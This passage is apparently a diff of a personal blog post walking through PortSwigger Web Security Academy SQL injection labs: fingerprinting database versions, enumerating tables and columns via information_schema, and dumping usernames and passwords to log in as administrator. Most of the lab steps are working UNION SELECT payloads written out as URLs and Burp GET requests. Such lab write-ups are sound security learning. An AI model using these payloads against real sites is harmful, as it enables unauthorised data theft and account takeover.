cyclopath83/cyclopath83.github.io/_posts/2023-06-06-Portswigger-Academy-SQL-Injection.md

 Now that this doens't return an error, we can actually check which database type we are dealing with:\
 `https://xxxxxx.web-security-academy.net/filter?category=Pets' UNION SELECT NULL,banner FROM v$version--`

+## LAB : SQL injection attack, querying the database type and version on MySQL and Microsoft

+Going back to the basics, on trying to figure out how many columns need to be returned by the injection, all attempts failed.\
+Both the normal `UNION SELECT NULL,NULL,NULL--` as well as the previous `UNION SELECT NULL,NULL,NULL FROM dual--`.\
+Looking at the SQL Injection cheat sheet, referred to in the lab, it shows that for MySQL you need to use the *#* to force exit a query statement.\
+However, trying this directly in the browser didn't work either...
+So...
+Welcome BurpSuite.

+Intercept the request to show the items in a certain category.
+And modify the GET call:\
+`GET /filter?category=Pets'+UNION+SELECT+NULL,NULL#`\
+`GET /filter?category=Pets'+UNION+SELECT+'abc','xzy'#`\
+`GET /filter?category=Pets'+UNION+SELECT+'abc',@@version#`

+## LAB : SQL injection attack, listing the database contents on non-Oracle databases.

+The lab tells us that it's not an Oracle database, so first things first, let's try to find the number of columns we need to return; and which can contain strings:\
+`https://xxxxxx.web-security-academy.net/filter?category=Pets' UNION SELECT NULL,NULL--`\
+`https://xxxxxx.web-security-academy.net/filter?category=Pets' UNION SELECT 'abc','xyz'--`

+We now know that we have two string columns, one for the title, one for the body.
+Let's see which tables exist in the database:\
+`https://xxxxxx.web-security-academy.net/filter?category=Pets' UNION SELECT 'existing tables',Table_Name FROM information_schema.tables--`

+In here, we see an interesting table `users_whjefl` (your's might be a different random string).
+Next up, see which colums exist in this table:\
+`https://xxxxxx.web-security-academy.net/filter?category=Pets' UNION SELECT 'existing columns',Column_Name FROM information_schema.columns WHERE Table_Name='users_whjefl'--`

+And also here, we find 2 interesting column names.
+One for the usernames, one for the passwords.
+Now we can extract all the user info:\
+`https://xxxxxx.web-security-academy.net/filter?category=Pets' UNION SELECT username_jdlmjy,password_pdopfu FROM users_whjefl--`

+With the usernames and passwords returned, we can login as the administrator on this website.